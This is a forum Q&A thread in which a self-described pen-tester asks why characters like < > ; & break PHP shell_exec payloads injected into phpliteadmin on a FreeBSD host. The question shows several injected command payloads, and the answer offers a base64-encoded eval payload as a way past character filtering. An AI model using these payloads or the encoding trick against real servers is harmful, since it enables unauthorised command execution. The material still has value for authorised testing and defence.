# php bash command injection

Tags: php, bash

I'm definitely not an expert in php, but I tried to look for an answer and I'm stuck. Let me explain the situation clearly.

During a pen-test I'm trying to exploit **phpliteadmin** (which uses sqlite) through command injection to get shell. Remote file inclusion is ruled out, so it comes down to LFI and RCE. Moreover, exploited machine is FreeBSD. I can execute ls, which, cat, echo and most of the linux commands through the typical shell_exec command. There are world writable folders, too. I was trying to write into a file, but it looks like some characters are not processed according to my intentions.

**Examples**:

1. `<?php echo shell_exec("echo 'a' > /tmp/4.txt");?>`
2. `<?php echo shell_exec("echo '2a' > /tmp/5.txt");?>`
3. `<?php echo shell_exec("echo '>a' > /tmp/6.txt");?>`
4. `<?php echo shell_exec("echo 'a;' > /tmp/7.txt");?>`
5. `<?php echo shell_exec("echo '&a' > /tmp/8.txt");?>`

and the **results**:

1. file created, a
2. file created, 2a
3. file not created
4. file created, blank
5. file created, blank

so it looks like signs **< > ; &** are the problem.

Does anyone know the workaround or link to a guide that can explain to me the problem?
Big thanks in advance!

add 1. tried `<?php echo shell_exec("echo .escapeshellarg(&a) > /tmp/8.txt");?>` with a similar result. It might be that my syntax is wrong...

Comment: `escapeshellarg` ? could possibly be disabled for security reasons. So even if your command was well-formed, it would likely not work.

Comment: Be careful when using double quotes, you can save yourself headaches doing it the other way round: use single quotes to wrap double quotes: `<?php echo shell_exec('echo ">a" > /tmp/6.txt');?>`

Answer (score 0):

Although this is way too late but it might help anyone else.
You can base64 encode your payload, and then decode it using eval.

```
<?php eval(base64_decode("base64_encoded_data")); ?>
```

You can use shell_exec in form of base64 encoded data to execute system commands.
For Ex:
You can encode `shell_exec("whoami");` which becomes c2hlbGxfZXhlYygid2hvYW1pIik7Cg==
This can be placed at that position to get it executed.

```
<?php eval(base64_decode("c2hlbGxfZXhlYygid2hvYW1pIik7Cg==")); ?>
```